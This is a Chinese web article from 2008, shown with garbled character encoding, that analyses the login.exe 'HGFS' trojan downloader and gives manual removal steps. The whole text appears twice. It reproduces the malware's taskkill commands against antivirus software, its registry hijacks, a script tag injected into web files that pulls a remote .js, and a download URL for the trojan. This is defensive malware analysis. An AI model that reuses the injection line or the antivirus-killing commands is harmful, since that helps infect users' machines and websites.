login.exe HGFS木馬下載器的手動(dòng)查殺方法
更新時(shí)間:2008年05月09日 13:42:39 作者:
這是一個(gè)具有感染腳本功能和局域網(wǎng)傳播功能的木馬下載器
樣本信息:File: login.exe
Size: 25428 bytes
Modified: 2008年4月25日, 16:30:08
MD5: 9777E8C79312F2E3D175AA1F64B07C11
SHA1: 4236D76C4FAEFE1CDF22414A25E946E493E0D52E
CRC32: 5A562203
1.病毒初始化:創(chuàng)建互斥量HGFSMUTEX,保證系統(tǒng)內(nèi)只有一個(gè)實(shí)例在運(yùn)行
2.釋放如下文件或者副本
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并復(fù)制到如下啟動(dòng)文件夾中達(dá)到開(kāi)機(jī)啟動(dòng)自身的目的
C:\Documents and Settings\Administrator\「開(kāi)始」菜單\程序\啟動(dòng)\login.exe
C:\Documents and Settings\All Users\「開(kāi)始」菜單\程序\啟動(dòng)\login.exe
C:\Documents and Settings\Default User\「開(kāi)始」菜單\程序\啟動(dòng)\login.exe
3.執(zhí)行connnet.bat批處理內(nèi)的內(nèi)容
a.遍歷d~z盤(pán) 復(fù)制%systemroot%\system32\Autorun.inf和%systemroot%\system32\Autorun.exe到其根目錄下
b.判斷中毒機(jī)器是否處于局域網(wǎng),如果是則利用ipc漏洞建立一個(gè)空連接,并把a(bǔ)utorun.exe和%autorun.inf復(fù)制到機(jī)器的C$下面。
4.IFEO劫持某些殺毒軟件
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmond.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravstub.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravtask.exe
指向c:\\我就不給你啟動(dòng).exe
5.試圖結(jié)束360軟件
cmd /c taskkill /im 360safe.exe /f
cmd /c taskkill /im 360tray.exe /f
6.遍歷所有磁盤(pán)刪除.gho文件
7.遍歷所有磁盤(pán)感染asp,htm,html,aspx,php等文件
在其尾部加入<script language=javascript src=http://down.******.cn/1.js></script>的代碼
8.鏈接網(wǎng)絡(luò)下載木馬
http://17vp.cn/down/gr.exe到
C:\Program Files\Internet Explorer\1.exe
但鏈接已經(jīng)失效
解決方法:
1.復(fù)制如下文字 到剪貼板(假設(shè)系統(tǒng)在C盤(pán))
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并復(fù)制到如下啟動(dòng)文件夾中達(dá)到開(kāi)機(jī)啟動(dòng)自身的目的
C:\Documents and Settings\Administrator\「開(kāi)始」菜單\程序\啟動(dòng)\login.exe
C:\Documents and Settings\All Users\「開(kāi)始」菜單\程序\啟動(dòng)\login.exe
C:\Documents and Settings\Default User\「開(kāi)始」菜單\程序\啟動(dòng)\login.exe
打開(kāi)Xdelbox.exe
在下面的大框中 單擊右鍵 點(diǎn)擊 “剪貼板導(dǎo)入不檢查路徑”
之后剛才復(fù)制的那個(gè)文件列表將出現(xiàn)在下面的大框中
然后再在下面的大框中單擊右鍵 點(diǎn)擊 “立即重啟執(zhí)行刪除”
軟件會(huì)自動(dòng)重啟計(jì)算機(jī)
重啟計(jì)算機(jī)以后 會(huì)有兩個(gè)系統(tǒng)進(jìn)入的選擇的倒計(jì)時(shí)界面
第一個(gè)是你原來(lái)的windows系統(tǒng)
第二個(gè)是這個(gè)軟件給你設(shè)定的dos系統(tǒng)
不用你管,它會(huì)自動(dòng)選擇進(jìn)入第二個(gè)系統(tǒng)
類(lèi)似dos的界面滾動(dòng)完畢以后 病毒就被刪除了
之后他會(huì)自動(dòng)重啟進(jìn)入正常模式
2.打開(kāi)sreng 啟動(dòng)項(xiàng)目 注冊(cè)表
刪除所有紅色的IFEO項(xiàng)目
3.建議屏蔽http://17vp.cn網(wǎng)站
Size: 25428 bytes
Modified: 2008年4月25日, 16:30:08
MD5: 9777E8C79312F2E3D175AA1F64B07C11
SHA1: 4236D76C4FAEFE1CDF22414A25E946E493E0D52E
CRC32: 5A562203
1.病毒初始化:創(chuàng)建互斥量HGFSMUTEX,保證系統(tǒng)內(nèi)只有一個(gè)實(shí)例在運(yùn)行
2.釋放如下文件或者副本
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并復(fù)制到如下啟動(dòng)文件夾中達(dá)到開(kāi)機(jī)啟動(dòng)自身的目的
C:\Documents and Settings\Administrator\「開(kāi)始」菜單\程序\啟動(dòng)\login.exe
C:\Documents and Settings\All Users\「開(kāi)始」菜單\程序\啟動(dòng)\login.exe
C:\Documents and Settings\Default User\「開(kāi)始」菜單\程序\啟動(dòng)\login.exe
3.執(zhí)行connnet.bat批處理內(nèi)的內(nèi)容
a.遍歷d~z盤(pán) 復(fù)制%systemroot%\system32\Autorun.inf和%systemroot%\system32\Autorun.exe到其根目錄下
b.判斷中毒機(jī)器是否處于局域網(wǎng),如果是則利用ipc漏洞建立一個(gè)空連接,并把a(bǔ)utorun.exe和%autorun.inf復(fù)制到機(jī)器的C$下面。
4.IFEO劫持某些殺毒軟件
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmond.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravstub.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravtask.exe
指向c:\\我就不給你啟動(dòng).exe
5.試圖結(jié)束360軟件
cmd /c taskkill /im 360safe.exe /f
cmd /c taskkill /im 360tray.exe /f
6.遍歷所有磁盤(pán)刪除.gho文件
7.遍歷所有磁盤(pán)感染asp,htm,html,aspx,php等文件
在其尾部加入<script language=javascript src=http://down.******.cn/1.js></script>的代碼
8.鏈接網(wǎng)絡(luò)下載木馬
http://17vp.cn/down/gr.exe到
C:\Program Files\Internet Explorer\1.exe
但鏈接已經(jīng)失效
解決方法:
1.復(fù)制如下文字 到剪貼板(假設(shè)系統(tǒng)在C盤(pán))
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并復(fù)制到如下啟動(dòng)文件夾中達(dá)到開(kāi)機(jī)啟動(dòng)自身的目的
C:\Documents and Settings\Administrator\「開(kāi)始」菜單\程序\啟動(dòng)\login.exe
C:\Documents and Settings\All Users\「開(kāi)始」菜單\程序\啟動(dòng)\login.exe
C:\Documents and Settings\Default User\「開(kāi)始」菜單\程序\啟動(dòng)\login.exe
打開(kāi)Xdelbox.exe
在下面的大框中 單擊右鍵 點(diǎn)擊 “剪貼板導(dǎo)入不檢查路徑”
之后剛才復(fù)制的那個(gè)文件列表將出現(xiàn)在下面的大框中
然后再在下面的大框中單擊右鍵 點(diǎn)擊 “立即重啟執(zhí)行刪除”
軟件會(huì)自動(dòng)重啟計(jì)算機(jī)
重啟計(jì)算機(jī)以后 會(huì)有兩個(gè)系統(tǒng)進(jìn)入的選擇的倒計(jì)時(shí)界面
第一個(gè)是你原來(lái)的windows系統(tǒng)
第二個(gè)是這個(gè)軟件給你設(shè)定的dos系統(tǒng)
不用你管,它會(huì)自動(dòng)選擇進(jìn)入第二個(gè)系統(tǒng)
類(lèi)似dos的界面滾動(dòng)完畢以后 病毒就被刪除了
之后他會(huì)自動(dòng)重啟進(jìn)入正常模式
2.打開(kāi)sreng 啟動(dòng)項(xiàng)目 注冊(cè)表
刪除所有紅色的IFEO項(xiàng)目
3.建議屏蔽http://17vp.cn網(wǎng)站
您可能感興趣的文章:
- python使用urllib模塊開(kāi)發(fā)的多線程豆瓣小站mp3下載器
- 關(guān)于WIN32.EXE變態(tài)木馬下載器的解決辦法
- 替換ctfmon.exe的下載器window.exe的方法
- Python制作CSDN免積分下載器
- 命令行使用支持?jǐn)帱c(diǎn)續(xù)傳的java多線程下載器
- php實(shí)現(xiàn)的css文件背景圖片下載器代碼
- 利用stream實(shí)現(xiàn)一個(gè)簡(jiǎn)單的http下載器
- Android編程開(kāi)發(fā)實(shí)現(xiàn)多線程斷點(diǎn)續(xù)傳下載器實(shí)例
- iOS開(kāi)發(fā)實(shí)現(xiàn)下載器的基本功能(1)
相關(guān)文章
手工查殺SMSS.exe hook.dll fOxkb.sys的方法
手工查殺SMSS.exe hook.dll fOxkb.sys的方法...2007-07-07“禽獸”病毒(殺軟終結(jié)者)的分析和手動(dòng)解決方法圖文
“禽獸”病毒(殺軟終結(jié)者)的分析和手動(dòng)解決方法圖文...2007-10-10利用tasklist與taskkill實(shí)現(xiàn)AV終結(jié)者新變種(隨機(jī)7位字母病毒)的刪除方法
利用tasklist與taskkill實(shí)現(xiàn)AV終結(jié)者新變種(隨機(jī)7位字母病毒)的刪除方法...2007-10-10SysWin7z.Jmp SysWin7z.sys木馬病毒的手動(dòng)刪除方法
SysWin7z.Jmp SysWin7z.sys木馬病毒的手動(dòng)刪除方法...2007-11-115月一更新的Auto病毒專(zhuān)殺工具 V2.0 _簡(jiǎn)體中文綠色免費(fèi)版
5月一更新的Auto病毒專(zhuān)殺工具 V2.0 _簡(jiǎn)體中文綠色免費(fèi)版...2007-05-05